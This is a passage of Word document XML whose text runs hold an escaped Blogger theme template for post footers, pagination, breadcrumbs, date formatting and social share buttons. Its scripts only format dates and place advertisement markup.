        <w:t xml:space="preserve">                                                      &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;span class='post-comment-link'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;b:include cond='data:blog.pageType not in {&amp;quot;item&amp;quot;,&amp;quot;static_page&amp;quot;}                                  and data:post.allowComments' data='post' name='comment_count_picker'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;div class='post-footer-line post-footer-line-2'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;b:if cond='data:top.showMobileShare'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;div class='mobile-link-button goog-inline-block' id='mobile-share-button'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                          &lt;a href='javascript:void(0);'&gt;&lt;data:shareMsg/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;b:if cond='data:top.showDummy'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;div class='goog-inline-block dummy-container'&gt;&lt;data:post.dummyTag/&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;b:include cond='data:blog.pageType in {&amp;quot;static_page&amp;quot;,&amp;quot;item&amp;quot;}' data='post' name='comment_picker'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:includable id='nextprev'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;div class='melesa-pager arrow' id='melesa-pager'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:if cond='data:newerPageUrl'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div id='melesa-new'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;a class='melesa-newer-link' expr:href='data:newerPageUrl' expr:title='data:newerPageTitle'&gt;&lt;i class='ion-chevron-left'/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:if cond='data:olderPageUrl'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div id='melesa-old'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                &lt;a class='melesa-older-link' expr:href='data:olderPageUrl' expr:title='data:olderPageTitle'&gt;&lt;i class='ion-chevron-right'/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;a class='melesa-home' expr:href='data:blog.homepageUrl'&gt;&lt;i class='ion-home'/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;div class='mlsa-pager-clear'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;div class='clear'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:includable id='post' var='post'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:if cond='data:blog.pageType in {&amp;quot;static_page&amp;quot;,&amp;quot;item&amp;quot;}'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;div class='post-meta'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div class='row'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;div class='col-sm-12'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;div class='breadcrumbs'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;a href='/'&gt;&lt;i class='ion-home'/&gt;&lt;/a&gt; &lt;i class='ion-chevron-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;b:if cond='data:top.showPostLabels and data:post.labels'&gt;&lt;b:loop values='data:post.labels' var='label'&gt;&lt;a class='melesa-max-limit' expr:href='data:label.url'&gt;&lt;data:label.name/&gt;&lt;/a&gt;&lt;b:if cond='not data:label.isLast'&gt; &lt;i class='ion-chevron-right'/&gt; &lt;/b:if&gt;&lt;/b:loop&gt;&lt;/b:if&gt; &lt;i class='ion-chevron-right'/&gt; &lt;a expr:href='data:post.url'&gt;&lt;data:post.title/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div class='row'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;div class='col-sm-12'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;h1 class='melesa-post-title'&gt;&lt;data:post.title/&gt;&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div class='row'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;div class='col-sm-12'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;div class='mlsa-meta'&gt;&lt;span class='mlsa-auth'&gt;By &lt;a expr:href='data:post.authorUrl'&gt;&lt;data:post.author/&gt;&lt;/a&gt;&lt;/span&gt; - &lt;span class='format-date mlsa-publish' expr:data-time='data:post.timestampISO8601'/&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;script&gt;$=jQuery,$(&amp;quot;.format-date&amp;quot;).map(function(){var e=$(this).attr(&amp;quot;data-time&amp;quot;),t=[&amp;quot;Jan&amp;quot;, &amp;quot;Feb&amp;quot;, &amp;quot;Mar&amp;quot;, &amp;quot;Apr&amp;quot;, &amp;quot;May&amp;quot;, &amp;quot;Jun&amp;quot;, &amp;quot;Jul&amp;quot;, &amp;quot;Aug&amp;quot;, &amp;quot;Sept&amp;quot;, &amp;quot;Oct&amp;quot;, &amp;quot;Nov&amp;quot;, &amp;quot;Dec&amp;quot;][(e=(e=e.split(&amp;quot;T&amp;quot;))[0].split(&amp;quot;-&amp;quot;))[1]-1]+&amp;quot; &amp;quot;+e[2]+&amp;quot;, &amp;quot;+e[0];$(this).html(t),$(this).removeClass(&amp;quot;.format-date&amp;quot;)});&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;hr/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;div class='post-body'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;data:post.body/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;div class='post-footer'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div class='melesa-left-tags'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;div class='tags-wrap'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                  &lt;b:if cond='data:top.showPostLabels and data:post.labels'&gt;&lt;span class='tags-title'&gt; Tags: &lt;/span&gt;&amp;lt;span class=&amp;quot;tags&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;b:loop values='data:post.labels' var='label'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;a expr:href='data:label.url' expr:title='&amp;quot;View all posts in &amp;quot; + data:label.name' rel='tag'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;data:label.name/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;b:if cond='not data:label.isLast'&gt;, &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;b:if cond='data:label.isLast'&gt;&amp;lt;/span&amp;gt;&lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;/b:loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div class='melesa-right-share'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;div class='social share-links clearfix'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;div class='count-share'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;ul class='social-icons list-unstyled list-inline'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;li class='social-item facebook'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;a class='post_share_facebook facebook' expr:href='&amp;quot;http://www.facebook.com/sharer.php?u=&amp;quot; + data:post.url' onclick='javascript:window.open(this.href,&amp;apos;&amp;apos;, &amp;apos;menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=220,width=600&amp;apos;);return false;' title='facebook'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                          &lt;i class='fa fa-facebook'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                          &lt;/i&gt; facebook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;li class='social-item twitter'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;a class='product_share_twitter twitter' expr:href='&amp;quot;https://twitter.com/share?url=&amp;quot; + data:post.url' onclick='javascript:window.open(this.href,&amp;apos;&amp;apos;, </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&amp;apos;menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=260,width=600&amp;apos;);return false;' title='twitter'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                          &lt;i class='fa fa-twitter'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                          &lt;/i&gt; twitter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;li class='social-item google'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;a class='googleplus' expr:href='&amp;quot;https://plus.google.com/share?url=&amp;quot; + data:post.url' onclick='javascript:window.open(this.href,&amp;apos;&amp;apos;, &amp;apos;menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600&amp;apos;);return false;' title='google +'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                          &lt;i class='fa fa-google-plus'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                          &lt;/i&gt; google+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div class='clearfix'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;div class='melesa-advertisement' id='melesa-bottom-advertisement'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                //&lt;![CDATA[</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                $(document).ready(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  $('#melesa-bottom-advertisement').html($('#melesa-btm-ad-pick').html());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                //]]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;div class='melesa-author'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div class='box box-author'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;div class='post-author'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;div class='author-img'&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
